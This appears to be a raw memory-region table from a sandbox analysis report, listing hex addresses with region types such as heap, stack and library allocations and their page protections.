heap
|
page read and write
|
||
20A28464000
|
heap
|
page read and write
|
||
2569DC80000
|
heap
|
page read and write
|
||
1E2EDDA0000
|
heap
|
page read and write
|
||
E2B6685000
|
stack
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
256A0B21000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page execute and read and write
|
||
2078FC01000
|
trusted library allocation
|
page read and write
|
||
1E2D5C9B000
|
trusted library allocation
|
page read and write
|
||
2078D82B000
|
heap
|
page read and write
|
||
7FF848C56000
|
trusted library allocation
|
page execute and read and write
|
||
20A283D8000
|
heap
|
page read and write
|
||
922BFBE000
|
stack
|
page read and write
|
||
1EBC1B83000
|
heap
|
page read and write
|
||
2569F996000
|
heap
|
page read and write
|
||
6130000
|
heap
|
page read and write
|
||
1D394985000
|
trusted library allocation
|
page read and write
|
||
2569F8D0000
|
trusted library allocation
|
page read and write
|
||
209567D3000
|
heap
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
7A107E000
|
stack
|
page read and write
|
||
922BA7E000
|
stack
|
page read and write
|
||
20959141000
|
trusted library allocation
|
page read and write
|
||
922BCFD000
|
stack
|
page read and write
|
||
7FF848BE0000
|
trusted library allocation
|
page read and write
|
||
1F552728000
|
trusted library allocation
|
page read and write
|
||
B87E27D000
|
stack
|
page read and write
|
||
20968949000
|
trusted library allocation
|
page read and write
|
||
20958DB6000
|
trusted library allocation
|
page read and write
|
||
14F3000
|
trusted library allocation
|
page execute and read and write
|
||
1F5422E0000
|
trusted library allocation
|
page read and write
|
||
1EBBFD3E000
|
heap
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A2E42000
|
trusted library allocation
|
page read and write
|
||
1D3911A0000
|
heap
|
page read and write
|
||
20A2A588000
|
trusted library allocation
|
page read and write
|
||
7FF848BEC000
|
trusted library allocation
|
page execute and read and write
|
||
1EBC1FC7000
|
heap
|
page read and write
|
||
1D3A2E4A000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
207A7832000
|
heap
|
page read and write
|
||
7FF848EC4000
|
trusted library allocation
|
page read and write
|
||
DAB000
|
heap
|
page read and write
|
||
F01097E000
|
stack
|
page read and write
|
||
20958E0D000
|
trusted library allocation
|
page read and write
|
||
20F53E2E000
|
heap
|
page read and write
|
||
207A77B0000
|
heap
|
page read and write
|
||
1F543D71000
|
trusted library allocation
|
page read and write
|
||
2078F6B1000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
2CEB000
|
heap
|
page read and write
|
||
1E2D58A5000
|
trusted library allocation
|
page read and write
|
||
DBE44FE000
|
stack
|
page read and write
|
||
F0106FF000
|
stack
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
209566D0000
|
heap
|
page read and write
|
||
2079F74C000
|
trusted library allocation
|
page read and write
|
||
20970861000
|
heap
|
page read and write
|
||
1EBBFC7A000
|
heap
|
page read and write
|
||
7FF848D52000
|
trusted library allocation
|
page read and write
|
||
1E2D5090000
|
heap
|
page read and write
|
||
7FF848C2C000
|
trusted library allocation
|
page execute and read and write
|
||
20A2A681000
|
trusted library allocation
|
page read and write
|
||
1D3A2E2C000
|
trusted library allocation
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B74000
|
trusted library allocation
|
page read and write
|
||
20958861000
|
trusted library allocation
|
page read and write
|
||
7FF848C46000
|
trusted library allocation
|
page execute and read and write
|
||
2078FF6A000
|
trusted library allocation
|
page read and write
|
||
2078FF80000
|
trusted library allocation
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page execute and read and write
|
||
20958DF2000
|
trusted library allocation
|
page read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
1F5408A5000
|
heap
|
page read and write
|
||
1E2D3806000
|
heap
|
page read and write
|
||
5058000
|
trusted library allocation
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
1EBC1CC0000
|
heap
|
page read and write
|
||
1E2ED8A0000
|
heap
|
page execute and read and write
|
||
7FF848B63000
|
trusted library allocation
|
page execute and read and write
|
||
F0105FE000
|
stack
|
page read and write
|
||
53BF000
|
stack
|
page read and write
|
||
1D39306B000
|
trusted library allocation
|
page read and write
|
||
E2B707E000
|
stack
|
page read and write
|
||
1F542E73000
|
trusted library allocation
|
page read and write
|
||
20F55B01000
|
trusted library allocation
|
page read and write
|
||
1770000
|
trusted library allocation
|
page execute and read and write
|
||
20A42220000
|
heap
|
page read and write
|
||
506D000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
7FF848CFA000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
D43000
|
trusted library allocation
|
page execute and read and write
|
||
1D3931EB000
|
trusted library allocation
|
page read and write
|
||
20F53F50000
|
trusted library allocation
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page execute and read and write
|
||
20A2A140000
|
trusted library allocation
|
page read and write
|
||
1E2D600A000
|
trusted library allocation
|
page read and write
|
||
267C000
|
unkown
|
page read and write
|
||
7FF848B63000
|
trusted library allocation
|
page execute and read and write
|
||
1D392E83000
|
trusted library allocation
|
page read and write
|
||
7FF848E99000
|
trusted library allocation
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
1EBC1D10000
|
heap
|
page read and write
|
||
2569F8E0000
|
heap
|
page execute and read and write
|
||
1EBC1FC0000
|
heap
|
page read and write
|
||
2078F7BF000
|
trusted library allocation
|
page read and write
|
||
5D81000
|
heap
|
page read and write
|
||
7FF848EA3000
|
trusted library allocation
|
page read and write
|
||
4FF3000
|
heap
|
page read and write
|
||
1F543728000
|
trusted library allocation
|
page read and write
|
||
20968913000
|
trusted library allocation
|
page read and write
|
||
1D391364000
|
heap
|
page read and write
|
||
20958D9E000
|
trusted library allocation
|
page read and write
|
||
1D391202000
|
heap
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
207A7AF9000
|
heap
|
page read and write
|
||
256B7ECB000
|
heap
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
D1E000
|
stack
|
page read and write
|
||
1D391160000
|
heap
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
20F53DB0000
|
heap
|
page read and write
|
||
2078FBF5000
|
trusted library allocation
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
1E2D5BA4000
|
trusted library allocation
|
page read and write
|
||
3899000
|
trusted library allocation
|
page read and write
|
||
1EBBFECE000
|
heap
|
page read and write
|
||
256A1183000
|
trusted library allocation
|
page read and write
|
||
285E000
|
trusted library allocation
|
page read and write
|
||
2569DD05000
|
heap
|
page read and write
|
||
7A13BE000
|
stack
|
page read and write
|
||
310A000
|
trusted library allocation
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
7DF4785A0000
|
trusted library allocation
|
page execute and read and write
|
||
1E2D5B44000
|
trusted library allocation
|
page read and write
|
||
2078D781000
|
heap
|
page read and write
|
||
507E000
|
stack
|
page read and write
|
||
1EBC1D10000
|
heap
|
page read and write
|
||
1E2D37D8000
|
heap
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
2078F590000
|
trusted library allocation
|
page read and write
|
||
1F543543000
|
trusted library allocation
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
B87E6BB000
|
stack
|
page read and write
|
||
1D3A2E80000
|
trusted library allocation
|
page read and write
|
||
209588A3000
|
trusted library allocation
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
1E2D5869000
|
trusted library allocation
|
page read and write
|
||
E2B6E7C000
|
stack
|
page read and write
|
||
1E2D3680000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
20F53E32000
|
heap
|
page read and write
|
||
7FF848D1A000
|
trusted library allocation
|
page read and write
|
||
1D391300000
|
trusted library allocation
|
page read and write
|
||
1F55ACDD000
|
heap
|
page read and write
|
||
1F54249E000
|
trusted library allocation
|
page read and write
|
||
7FF848BF6000
|
trusted library allocation
|
page read and write
|
||
2880000
|
heap
|
page read and write
|
||
1E2ED74B000
|
heap
|
page read and write
|
||
922CE0E000
|
stack
|
page read and write
|
||
BD57A7E000
|
stack
|
page read and write
|
||
20959143000
|
trusted library allocation
|
page read and write
|
||
5066000
|
trusted library allocation
|
page read and write
|
||
256B7D72000
|
heap
|
page read and write
|
||
20F53DD0000
|
heap
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page execute and read and write
|
||
D80000
|
heap
|
page read and write
|
||
BD3000
|
trusted library allocation
|
page read and write
|
||
256B7F09000
|
heap
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
1EBC1D10000
|
heap
|
page read and write
|
||
1750000
|
heap
|
page read and write
|
||
2569F923000
|
heap
|
page read and write
|
||
1D3912A0000
|
heap
|
page read and write
|
||
1F55A8AC000
|
heap
|
page read and write
|
||
1D3AB117000
|
heap
|
page read and write
|
||
5D51000
|
heap
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
1E2D54B0000
|
trusted library allocation
|
page read and write
|
||
F0101CF000
|
stack
|
page read and write
|
||
6CA000
|
stack
|
page read and write
|
||
7A143E000
|
stack
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
20A424F2000
|
heap
|
page read and write
|
||
1EBC1B22000
|
heap
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
21CAFDE0000
|
heap
|
page read and write
|
||
7FF848D21000
|
trusted library allocation
|
page read and write
|
||
7FF848D12000
|
trusted library allocation
|
page read and write
|
||
1EBC1D29000
|
heap
|
page read and write
|
||
1EBC1DC0000
|
heap
|
page read and write
|
||
6DC8000
|
heap
|
page read and write
|
||
BE6000
|
trusted library allocation
|
page execute and read and write
|
||
1D393C6B000
|
trusted library allocation
|
page read and write
|
||
1F543C89000
|
trusted library allocation
|
page read and write
|
||
20F57367000
|
trusted library allocation
|
page read and write
|
||
BD0000
|
trusted library allocation
|
page read and write
|
||
21CAFDEA000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1F55AB20000
|
heap
|
page execute and read and write
|
||
1D3AB177000
|
heap
|
page read and write
|
||
20958E09000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
20970BAD000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
1F5434E0000
|
trusted library allocation
|
page read and write
|
||
7A0B4D000
|
stack
|
page read and write
|
||
2AD6000
|
trusted library allocation
|
page read and write
|
||
35522FE000
|
stack
|
page read and write
|
||
1D3946E3000
|
trusted library allocation
|
page read and write
|
||
1D39475B000
|
trusted library allocation
|
page read and write
|
||
256B7F38000
|
heap
|
page read and write
|
||
1EBC1CCF000
|
heap
|
page read and write
|
||
1D3AB41F000
|
heap
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
20F6E2D0000
|
heap
|
page read and write
|
||
30FE000
|
stack
|
page read and write
|
||
1F55AA40000
|
heap
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
20970BB7000
|
heap
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
DBE45F9000
|
stack
|
page read and write
|
||
1D392C50000
|
heap
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
20A2A15D000
|
trusted library allocation
|
page read and write
|
||
290F000
|
stack
|
page read and write
|
||
1F55AB50000
|
heap
|
page read and write
|
||
B87E43E000
|
stack
|
page read and write
|
||
207A7990000
|
heap
|
page execute and read and write
|
||
1F544242000
|
trusted library allocation
|
page read and write
|
||
20958DF6000
|
trusted library allocation
|
page read and write
|
||
1E2D58AB000
|
trusted library allocation
|
page read and write
|
||
20A282F0000
|
heap
|
page read and write
|
||
3121000
|
trusted library allocation
|
page read and write
|
||
7FF848C46000
|
trusted library allocation
|
page execute and read and write
|
||
7C8000
|
stack
|
page read and write
|
||
50FE000
|
stack
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
20958D73000
|
trusted library allocation
|
page read and write
|
||
7FF848CEA000
|
trusted library allocation
|
page read and write
|
||
922BDBE000
|
stack
|
page read and write
|
||
2C055924000
|
heap
|
page read and write
|
||
7FF848BE0000
|
trusted library allocation
|
page read and write
|
||
1F55A870000
|
heap
|
page read and write
|
||
2078FB9E000
|
trusted library allocation
|
page read and write
|
||
2F5E000
|
stack
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page execute and read and write
|
||
1EBC1FC1000
|
heap
|
page read and write
|
||
1EBC1B9E000
|
heap
|
page read and write
|
||
1EBC1B5B000
|
heap
|
page read and write
|
||
20A2A5ED000
|
trusted library allocation
|
page read and write
|
||
DDE000
|
heap
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
CF6000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1EBC1CDD000
|
heap
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page read and write
|
||
20F53EB6000
|
heap
|
page read and write
|
||
2078F6FD000
|
trusted library allocation
|
page read and write
|
||
2840000
|
trusted library allocation
|
page read and write
|
||
1350000
|
heap
|
page read and write
|
||
922CC0E000
|
stack
|
page read and write
|
||
CCB000
|
stack
|
page read and write
|
||
1EBC1AF8000
|
heap
|
page read and write
|
||
20F57738000
|
trusted library allocation
|
page read and write
|
||
922BEB9000
|
stack
|
page read and write
|
||
20F53EA9000
|
heap
|
page read and write
|
||
7FF848D11000
|
trusted library allocation
|
page read and write
|
||
1EBBFC62000
|
heap
|
page read and write
|
||
1F552718000
|
trusted library allocation
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
20A2A5A8000
|
trusted library allocation
|
page read and write
|
||
20F53F10000
|
heap
|
page read and write
|
||
408000
|
remote allocation
|
page execute and read and write
|
||
7FF848D2A000
|
trusted library allocation
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
1D3943D6000
|
trusted library allocation
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
1F55A907000
|
heap
|
page read and write
|
||
5C4F000
|
stack
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
1E2ED79B000
|
heap
|
page read and write
|
||
20958E02000
|
trusted library allocation
|
page read and write
|
||
5054000
|
trusted library allocation
|
page read and write
|
||
207A7871000
|
heap
|
page read and write
|
||
BC3000
|
trusted library allocation
|
page execute and read and write
|
||
2569FC22000
|
trusted library allocation
|
page read and write
|
||
256B7FF7000
|
heap
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1E2D37BC000
|
heap
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1E2ED81D000
|
heap
|
page read and write
|
||
256AFCF0000
|
trusted library allocation
|
page read and write
|
||
20F53DF8000
|
heap
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
21CAFC80000
|
heap
|
page read and write
|
||
7FF848C1C000
|
trusted library allocation
|
page execute and read and write
|
||
1D3AB2A0000
|
heap
|
page read and write
|
||
1D3912E0000
|
trusted library allocation
|
page read and write
|
||
1EBBFEC8000
|
heap
|
page read and write
|
||
922CD0C000
|
stack
|
page read and write
|
||
20A2A62B000
|
trusted library allocation
|
page read and write
|
||
E31000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
1D3A2EBE000
|
trusted library allocation
|
page read and write
|
||
2569DC20000
|
heap
|
page read and write
|
||
5940000
|
heap
|
page execute and read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
29C087E000
|
stack
|
page read and write
|
||
7FF848B64000
|
trusted library allocation
|
page read and write
|
||
1F5437E6000
|
trusted library allocation
|
page read and write
|
||
20958500000
|
trusted library allocation
|
page read and write
|
||
1F542280000
|
trusted library section
|
page read and write
|
||
1EBC1B9E000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
7FF848D11000
|
trusted library allocation
|
page read and write
|
||
1440000
|
heap
|
page read and write
|
||
20F55790000
|
trusted library allocation
|
page read and write
|
||
1EBBFECE000
|
heap
|
page read and write
|
||
20A2A9D7000
|
trusted library allocation
|
page read and write
|
||
20968923000
|
trusted library allocation
|
page read and write
|
||
51A0000
|
heap
|
page execute and read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
20A28430000
|
trusted library allocation
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
7FF848D12000
|
trusted library allocation
|
page read and write
|
||
1EBC1CC1000
|
heap
|
page read and write
|
||
1E2E5741000
|
trusted library allocation
|
page read and write
|
||
1D3A2F5E000
|
trusted library allocation
|
page read and write
|
||
DBE4379000
|
stack
|
page read and write
|
||
D7E000
|
heap
|
page read and write
|
||
1026000
|
heap
|
page read and write
|
||
20F53F70000
|
trusted library allocation
|
page read and write
|
||
55BE000
|
stack
|
page read and write
|
||
1F5408E5000
|
heap
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
209588AB000
|
trusted library allocation
|
page read and write
|
||
1E2D5741000
|
trusted library allocation
|
page read and write
|
||
2C055920000
|
heap
|
page read and write
|
||
557E000
|
stack
|
page read and write
|
||
20F56FCF000
|
trusted library allocation
|
page read and write
|
||
21CAFEE0000
|
heap
|
page read and write
|
||
5E30000
|
trusted library allocation
|
page read and write
|
||
20F6E06D000
|
heap
|
page read and write
|
||
1EBC1D10000
|
heap
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
20A2A9C5000
|
trusted library allocation
|
page read and write
|
||
1D3943E5000
|
trusted library allocation
|
page read and write
|
||
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
4125000
|
trusted library allocation
|
page read and write
|
||
20958F4C000
|
trusted library allocation
|
page read and write
|
||
DBE54CE000
|
stack
|
page read and write
|
||
1D3A2E70000
|
trusted library allocation
|
page read and write
|
||
2C0554B0000
|
heap
|
page read and write
|
||
2078FBDA000
|
trusted library allocation
|
page read and write
|
||
DFF000
|
heap
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page execute and read and write
|
||
1E2ED80B000
|
heap
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
922C1BB000
|
stack
|
page read and write
|
||
2078F7C2000
|
trusted library allocation
|
page read and write
|
||
1F55AA4D000
|
heap
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
2079F6A1000
|
trusted library allocation
|
page read and write
|
||
105A000
|
trusted library allocation
|
page read and write
|
||
256A17DD000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
2095912A000
|
trusted library allocation
|
page read and write
|
||
1E2D586F000
|
trusted library allocation
|
page read and write
|
||
1E2ED74F000
|
heap
|
page read and write
|
||
256B7EB2000
|
heap
|
page read and write
|
||
2078D738000
|
heap
|
page read and write
|
||
20956705000
|
heap
|
page read and write
|
||
256A0451000
|
trusted library allocation
|
page read and write
|
||
256B7F77000
|
heap
|
page read and write
|
||
1EBBFC80000
|
heap
|
page read and write
|
||
29C05EE000
|
stack
|
page read and write
|
||
2C05566A000
|
heap
|
page read and write
|
||
2B7D000
|
stack
|
page read and write
|
||
1EBC1FC1000
|
heap
|
page read and write
|
||
20A3A1BB000
|
trusted library allocation
|
page read and write
|
||
2078F6A1000
|
trusted library allocation
|
page read and write
|
||
1E2D3852000
|
heap
|
page read and write
|
||
35520FA000
|
stack
|
page read and write
|
||
20A3A101000
|
trusted library allocation
|
page read and write
|
||
2078F5E0000
|
heap
|
page readonly
|
||
2079F763000
|
trusted library allocation
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page execute and read and write
|
||
F01018F000
|
stack
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
1D391140000
|
heap
|
page read and write
|
||
1D3AB119000
|
heap
|
page read and write
|
||
2096890B000
|
trusted library allocation
|
page read and write
|
||
207A77FA000
|
heap
|
page read and write
|
||
20A28393000
|
heap
|
page read and write
|
||
1D394365000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
20A2A61F000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
256B7ED7000
|
heap
|
page read and write
|
||
8EB000
|
stack
|
page read and write
|
||
5738000
|
trusted library allocation
|
page read and write
|
||
20958DA6000
|
trusted library allocation
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
1D391360000
|
heap
|
page read and write
|
||
922C03E000
|
stack
|
page read and write
|
||
7FF848B8C000
|
trusted library allocation
|
page read and write
|
||
20F53F90000
|
trusted library allocation
|
page read and write
|
||
1D3AB0D0000
|
heap
|
page read and write
|
||
1D392C00000
|
heap
|
page execute and read and write
|
||
1D3A2E0F000
|
trusted library allocation
|
page read and write
|
||
1EBC206C000
|
heap
|
page read and write
|
||
207A7997000
|
heap
|
page execute and read and write
|
||
1EBC1CED000
|
heap
|
page read and write
|
||
1EBC1CEC000
|
heap
|
page read and write
|
||
7FF848D42000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1D393218000
|
trusted library allocation
|
page read and write
|
||
7FF848E62000
|
trusted library allocation
|
page read and write
|
||
E2B6C7E000
|
stack
|
page read and write
|
||
20A3A170000
|
trusted library allocation
|
page read and write
|
||
20958E19000
|
trusted library allocation
|
page read and write
|
||
2C055590000
|
heap
|
page read and write
|
||
7FF848EA8000
|
trusted library allocation
|
page read and write
|
||
4BFE000
|
stack
|
page read and write
|
||
1D3AB277000
|
heap
|
page execute and read and write
|
||
256B7D6B000
|
heap
|
page read and write
|
||
2078F6DE000
|
trusted library allocation
|
page read and write
|
||
BD576FD000
|
stack
|
page read and write
|
||
7FF848B73000
|
trusted library allocation
|
page execute and read and write
|
||
1EBBFECA000
|
heap
|
page read and write
|
||
1D393067000
|
trusted library allocation
|
page read and write
|
||
7FF848B7D000
|
trusted library allocation
|
page execute and read and write
|
||
209589C1000
|
trusted library allocation
|
page read and write
|
||
20A2A266000
|
trusted library allocation
|
page read and write
|
||
20970BBC000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
35527FD000
|
stack
|
page read and write
|
||
5755000
|
trusted library allocation
|
page read and write
|
||
20F6DE94000
|
heap
|
page read and write
|
||
F01047F000
|
stack
|
page read and write
|
||
209584D0000
|
trusted library allocation
|
page read and write
|
||
1D391226000
|
heap
|
page read and write
|
||
1D3AB198000
|
heap
|
page read and write
|
||
7DF43D540000
|
trusted library allocation
|
page execute and read and write
|
||
20958D9A000
|
trusted library allocation
|
page read and write
|
||
1F542260000
|
heap
|
page read and write
|
||
2569DC88000
|
heap
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
7A1F0E000
|
stack
|
page read and write
|
||
1530000
|
heap
|
page read and write
|
||
D20000
|
trusted library allocation
|
page execute and read and write
|
||
256A0C10000
|
trusted library allocation
|
page read and write
|
||
2078D740000
|
heap
|
page read and write
|
||
2569FECE000
|
trusted library allocation
|
page read and write
|
||
209688D1000
|
trusted library allocation
|
page read and write
|
||
20958E11000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
35529FF000
|
stack
|
page read and write
|
||
1790000
|
heap
|
page read and write
|
||
256B7EDF000
|
heap
|
page read and write
|
||
50BE000
|
stack
|
page read and write
|
||
DBE3F33000
|
stack
|
page read and write
|
||
1D3AAC68000
|
heap
|
page read and write
|
||
1D39325B000
|
trusted library allocation
|
page read and write
|
||
2569F814000
|
heap
|
page read and write
|
||
256A0A92000
|
trusted library allocation
|
page read and write
|
||
2866000
|
trusted library allocation
|
page read and write
|
||
2E1E000
|
unkown
|
page read and write
|
||
256AFCEA000
|
trusted library allocation
|
page read and write
|
||
20A424B8000
|
heap
|
page read and write
|
||
1E2D3890000
|
heap
|
page read and write
|
||
3891000
|
trusted library allocation
|
page read and write
|
||
1F542421000
|
trusted library allocation
|
page read and write
|
||
2AB1000
|
trusted library allocation
|
page read and write
|
||
BD57779000
|
stack
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
20956720000
|
heap
|
page read and write
|
||
7A0F7E000
|
stack
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
B87E07E000
|
stack
|
page read and write
|
||
7FF848D58000
|
trusted library allocation
|
page read and write
|
||
20A3A1B3000
|
trusted library allocation
|
page read and write
|
||
4EAC000
|
stack
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
5705000
|
trusted library allocation
|
page read and write
|
||
209567DC000
|
heap
|
page read and write
|
||
7FF848B42000
|
trusted library allocation
|
page read and write
|
||
2078FBBB000
|
trusted library allocation
|
page read and write
|
||
307E000
|
stack
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
1D3946D3000
|
trusted library allocation
|
page read and write
|
||
7A11B7000
|
stack
|
page read and write
|
||
1D391354000
|
heap
|
page read and write
|
||
20A2A677000
|
trusted library allocation
|
page read and write
|
||
BF2000
|
trusted library allocation
|
page read and write
|
||
B9C000
|
stack
|
page read and write
|
||
1EBC1CE9000
|
heap
|
page read and write
|
||
FEE000
|
stack
|
page read and write
|
||
209591A6000
|
trusted library allocation
|
page read and write
|
||
D6A000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
1D3A2C61000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
20958DC1000
|
trusted library allocation
|
page read and write
|
||
1D39306F000
|
trusted library allocation
|
page read and write
|
||
2079F711000
|
trusted library allocation
|
page read and write
|
||
B87E5BE000
|
stack
|
page read and write
|
||
2569DE90000
|
heap
|
page read and write
|
||
20F55860000
|
heap
|
page read and write
|
||
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
20A2A221000
|
trusted library allocation
|
page read and write
|
||
922CB8E000
|
stack
|
page read and write
|
||
2078FC1B000
|
trusted library allocation
|
page read and write
|
||
2095681A000
|
heap
|
page read and write
|
||
60F0000
|
trusted library allocation
|
page read and write
|
||
20F53F80000
|
heap
|
page readonly
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
1EBC1D2D000
|
heap
|
page read and write
|
||
1F542400000
|
heap
|
page execute and read and write
|
||
5B4E000
|
stack
|
page read and write
|
||
20970B17000
|
heap
|
page execute and read and write
|
||
B87E1FE000
|
stack
|
page read and write
|
||
2569F8E6000
|
heap
|
page execute and read and write
|
||
1020000
|
heap
|
page read and write
|
||
20A28490000
|
trusted library allocation
|
page read and write
|
||
1D3A2C78000
|
trusted library allocation
|
page read and write
|
||
256B7E90000
|
heap
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
20A3A1EB000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
1F55AC3C000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
7FF848C80000
|
trusted library allocation
|
page execute and read and write
|
||
20A42337000
|
heap
|
page execute and read and write
|
||
2B01000
|
trusted library allocation
|
page read and write
|
||
2078D829000
|
heap
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
1D3946F4000
|
trusted library allocation
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
20A2A686000
|
trusted library allocation
|
page read and write
|
||
F0104FE000
|
stack
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
1F543020000
|
trusted library allocation
|
page read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
1D392C61000
|
trusted library allocation
|
page read and write
|
||
503F000
|
stack
|
page read and write
|
||
2569F640000
|
trusted library allocation
|
page read and write
|
||
1E2D377E000
|
heap
|
page read and write
|
||
256B7FE7000
|
heap
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
2078FB46000
|
trusted library allocation
|
page read and write
|
||
7FF848C1C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B6D000
|
trusted library allocation
|
page execute and read and write
|
||
3110000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
20F65B7D000
|
trusted library allocation
|
page read and write
|
||
1E2D57AD000
|
trusted library allocation
|
page read and write
|
||
1E2D37B8000
|
heap
|
page read and write
|
||
